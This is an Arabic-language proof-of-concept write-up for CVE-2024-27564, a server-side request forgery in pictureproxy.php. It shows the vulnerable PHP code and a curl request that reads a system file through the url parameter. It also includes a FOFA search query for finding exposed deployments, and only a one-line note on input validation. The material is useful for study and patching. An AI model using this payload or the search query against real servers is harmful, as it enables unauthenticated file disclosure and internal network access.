
إثبات المفهوم لثغرة CVE-2024-27564، وهي ثغرة تزوير الطلبات من جانب الخادم (SSRF) في pictureproxy.php تسمح للمهاجمين عن بعد غير المصادق عليهم بحقن عناوين URL عشوائية عبر معامل url.
ثغرة في pictureproxy.php تسمح للمهاجمين عن بُعد بتنفيذ طلبات عشوائية عن طريق حقن عناوين URL في معامل url. يمكن استغلال ثغرة SSRF هذه دون مصادقة، مما يجعلها خطيرة بشكل خاص.
الكود الضعيف موجود في ملف pictureproxy.php. تحدث المشكلة لأن الدالة لا تتحقق بشكل صحيح من معامل url. يتم تمرير المتغير $_GET['url'] إلى الدالة file_get_contents()، التي تجلب المحتوى من عنوان URL المحدد. يمكن أن يؤدي هذا إلى SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
طلب Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
يلزم إدارة صحيحة للتحقق من المدخلات.